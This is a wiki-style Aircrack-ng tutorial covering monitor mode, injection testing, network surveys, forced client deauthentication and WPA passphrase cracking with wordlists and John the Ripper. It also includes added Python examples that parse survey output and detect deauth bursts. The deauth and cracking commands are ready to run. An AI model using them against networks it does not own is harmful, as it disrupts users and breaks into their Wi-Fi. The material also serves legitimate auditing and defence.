Aircrack-ng
Installation
svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng-svn
cd aircrack-ng-svn
make
sudo make install prefix=/opt/aircrack-ng
export MANPATH=/opt/aircrack-ng/share/man:$MANPATH
If libgcrypt is installed, we can try to compile with:
port install libgcrypt         # Macports
yum install libgcrypt-devel    # Fedora
make gcrypt=true COMMON_CFLAGS="-I/opt/local/include" LDFLAGS="-L/opt/local/lib"
Note: Please see #1022 ("swap pkh.len when running o a big endian machine") for endianness issues!
Usage
apt-get install iw # This will be needed by some of the Aircrack-ng tools
Enable monitoring mode:
airmon-ng start wlan0
Note that for cracking WPA/WPA2, injection needs to work:
$ aireplay-ng --test wlan0
23:01:00  Trying broadcast probe requests...
23:01:00  Injection is working!
23:01:02  Found 1 AP
23:01:02  Trying directed probe requests...
23:01:02  00:11:22:33:44:55 - channel: 1 - 'Foobar'
23:01:02  Ping (min/avg/max): 1.840ms/19.448ms/37.824ms Power: -35.57
23:01:02  30/30: 100%
OK, injection seems to work. Now, look around your WiFi neighbourhood:
$ airodump-ng wlan0

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
00:11:22:33:44:55  -19 100     3468    82803  237   1  54e. WPA2 CCMP   PSK  Foobar

BSSID              STATION            PWR   Rate     Lost  Frames  Probe
00:11:22:33:44:55  00:22:22:22:22:01   -1   48e- 0      0   31667
00:11:22:33:44:55  00:22:22:22:22:02  -63   54e-54e    0    6291
00:11:22:33:44:55  00:22:22:22:22:03  -68   54e-54e  668   45790
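When you use this survey to audit your own networks rather than to read it by eye, it helps to turn the two tables into records and flag anything that is not WPA2/WPA3 with CCMP or GCMP. The parser below is an added example and not part of Aircrack-ng; it works on the screen layout shown above (a saved terminal dump), not on airodump-ng's CSV output. The sample text is constructed from the table above plus one hypothetical WEP network ("OldPrinter") so that the weak-network check has something to report.

```python
import re
from dataclasses import dataclass

MAC = r"(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}"

# One access-point row: fixed numeric columns, then ENC, optional CIPHER and
# AUTH (open networks leave them blank), then the ESSID which may contain spaces.
AP_LINE = re.compile(
    rf"^\s*(?P<bssid>{MAC})\s+(?P<pwr>-?\d+)\s+(?P<rxq>\d+)\s+(?P<beacons>\d+)\s+"
    rf"(?P<data>\d+)\s+(?P<per_s>\d+)\s+(?P<ch>\d+)\s+(?P<mb>\S+)\s+(?P<enc>\S+)"
    r"(?:\s+(?P<cipher>CCMP|GCMP|TKIP|WEP|WEP40|WEP104))?(?:\s+(?P<auth>PSK|MGT|SAE|OPN))?"
    r"\s*(?P<essid>.*?)\s*$"
)
# One station row: the Rate column is "tx-rx" and may contain a space ("48e- 0").
STA_LINE = re.compile(
    rf"^\s*(?P<bssid>{MAC}|\(not associated\))\s+(?P<station>{MAC})\s+(?P<pwr>-?\d+)\s+"
    r"(?P<rate>\d+e?\s*-\s*\d+e?)\s+(?P<lost>\d+)\s+(?P<frames>\d+)\s*(?P<probe>.*?)\s*$"
)


@dataclass
class AccessPoint:
    bssid: str
    power: int
    channel: int
    enc: str
    cipher: str
    auth: str
    essid: str


@dataclass
class Station:
    bssid: str
    station: str
    power: int
    rate: str
    lost: int
    frames: int
    probe: str


def parse_airodump(text):
    """Return ({bssid: AccessPoint}, [Station]) from a saved airodump-ng screen."""
    aps, stations = {}, []
    for line in text.splitlines():
        m = STA_LINE.match(line)          # try the station layout first
        if m:
            stations.append(Station(m["bssid"], m["station"], int(m["pwr"]), m["rate"],
                                    int(m["lost"]), int(m["frames"]), m["probe"]))
            continue
        m = AP_LINE.match(line)
        if m:
            aps[m["bssid"]] = AccessPoint(m["bssid"], int(m["pwr"]), int(m["ch"]), m["enc"],
                                          m["cipher"] or "", m["auth"] or "", m["essid"])
    return aps, stations


def weak_networks(aps):
    """ESSIDs whose encryption is anything other than WPA2/WPA3 with CCMP or GCMP."""
    return sorted(ap.essid for ap in aps.values()
                  if ap.enc not in ("WPA2", "WPA3") or ap.cipher not in ("CCMP", "GCMP"))


def clients_of(stations, bssid):
    return [s.station for s in stations if s.bssid == bssid]


# Constructed sample: the table above plus one hypothetical WEP network.
SAMPLE = """\
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:11:22:33:44:55  -19 100     3468    82803  237   1  54e. WPA2 CCMP   PSK  Foobar
 AA:BB:CC:DD:EE:FF  -70  80     1200      100    0   6  54e  WEP  WEP         OldPrinter

 BSSID              STATION            PWR   Rate     Lost  Frames  Probe
 00:11:22:33:44:55  00:22:22:22:22:01   -1   48e- 0      0   31667
 00:11:22:33:44:55  00:22:22:22:22:02  -63   54e-54e    0    6291
 00:11:22:33:44:55  00:22:22:22:22:03  -68   54e-54e  668   45790
"""

if __name__ == "__main__":
    aps, stations = parse_airodump(SAMPLE)
    for ap in aps.values():
        print(f"{ap.essid:12} ch {ap.channel:2} {ap.enc} {ap.cipher} {ap.auth} "
              f"clients={clients_of(stations, ap.bssid)}")
    print("weak:", weak_networks(SAMPLE and aps))
```

The two regexes are tried per line in a fixed order: a station row starts with two MAC addresses, an AP row with a MAC followed by a signed power value, so neither pattern can match the other's rows or the header lines.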
Dump WiFi packets to a file:
airodump-ng -w wlan0.pcap --bssid 00:11:22:33:44:55 --channel 3 wlan0
While airodump-ng is running, generate some packets on the network so that more data is gathered:
aireplay-ng -a 00:11:22:33:44:55 -c 00:22:22:22:22:03 --deauth 1 wlan0
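The frames this step injects are unauthenticated management frames; a network without Protected Management Frames (802.11w) has no way to tell them from a real deauthentication by the access point, which is why a burst of them disconnects the station and makes it re-handshake. From the defender's side the same property makes them easy to spot in a monitor-mode capture: real deauthentications are rare, spoofed ones arrive in bursts. The detector below is an added example, not Aircrack-ng code; it assumes raw 802.11 frames with any radiotap header already stripped, and the capture it runs on is constructed inline (the reason code 7 in the sample is a constructed value).

```python
import struct
from collections import Counter

# 802.11 frame-control values: type 0 = management, type 2 = data,
# management subtype 8 = beacon, subtype 12 = deauthentication.
TYPE_MGMT, TYPE_DATA = 0, 2
SUBTYPE_BEACON, SUBTYPE_DEAUTH = 8, 12
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def mac_bytes(text):
    return bytes(int(x, 16) for x in text.split(":"))


def parse_frame(raw):
    """Decode the 24-byte MAC header (addr1 = receiver, addr2 = transmitter,
    addr3 = BSSID for management frames) and, for deauth, the reason code."""
    if len(raw) < 24:
        return None
    fc0 = raw[0]                               # low byte of frame control
    frame = {
        "type": (fc0 >> 2) & 0x3,
        "subtype": (fc0 >> 4) & 0xF,
        "dst": mac_str(raw[4:10]),
        "src": mac_str(raw[10:16]),
        "bssid": mac_str(raw[16:22]),
    }
    if frame["type"] == TYPE_MGMT and frame["subtype"] == SUBTYPE_DEAUTH and len(raw) >= 26:
        frame["reason"] = struct.unpack_from("<H", raw, 24)[0]   # little-endian reason code
    return frame


def build_frame(ftype, subtype, dst, src, bssid, body=b""):
    """Constructed helper for the sample capture: no flags, duration 0,
    sequence control 0, addresses in the no-DS layout (only the type matters here)."""
    fc0 = (subtype << 4) | (ftype << 2)
    return (bytes([fc0, 0x00, 0x00, 0x00]) + mac_bytes(dst) + mac_bytes(src)
            + mac_bytes(bssid) + b"\x00\x00" + body)


def find_deauth_bursts(frames, threshold):
    """Count deauth frames per (bssid, transmitter, receiver); report any tuple
    at or above the threshold, and broadcast deauths regardless of count."""
    counts = Counter()
    for raw in frames:
        f = parse_frame(raw)
        if f and f["type"] == TYPE_MGMT and f["subtype"] == SUBTYPE_DEAUTH:
            counts[(f["bssid"], f["src"], f["dst"])] += 1
    return {k: n for k, n in counts.items() if n >= threshold or k[2] == BROADCAST}


AP = "00:11:22:33:44:55"      # the access point from the survey above
STA = "00:22:22:22:22:03"     # one of its stations


def sample_frames():
    """Constructed capture: one beacon, one data frame, then five deauth
    frames that claim to come from the AP, addressed to the station."""
    frames = [
        build_frame(TYPE_MGMT, SUBTYPE_BEACON, BROADCAST, AP, AP),
        build_frame(TYPE_DATA, 0, AP, STA, AP),
    ]
    frames += [build_frame(TYPE_MGMT, SUBTYPE_DEAUTH, STA, AP, AP, struct.pack("<H", 7))
               for _ in range(5)]
    return frames


if __name__ == "__main__":
    for (bssid, src, dst), n in find_deauth_bursts(sample_frames(), threshold=3).items():
        print(f"{n} deauth frames on {bssid}: {src} -> {dst}")
```

On a real capture the threshold should be applied per time window rather than over the whole file, and the transmitter address is worth comparing against the BSSID: a deauth "from" the AP that the AP did not send is exactly what 802.11w is designed to make the station discard.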
Try to crack with a password file:
aircrack-ng -w /usr/share/dict/words -b 00:11:22:33:44:55 wlan0.pcap
A good password file is crucial for this to succeed. John the Ripper may be of help here:
john --stdout --incremental:all | aircrack-ng -w - -b 00:11:22:33:44:55 wlan0.pcap
As there's no way to pause aircrack-ng, we can use JtR's resume feature to continue cracking later on:
john --stdout --incremental:all --session=foo | aircrack-ng -w - -b 00:11:22:33:44:55 wlan0.pcap
^C
john --restore=foo | aircrack-ng -w - -b 00:11:22:33:44:55 wlan0.pcap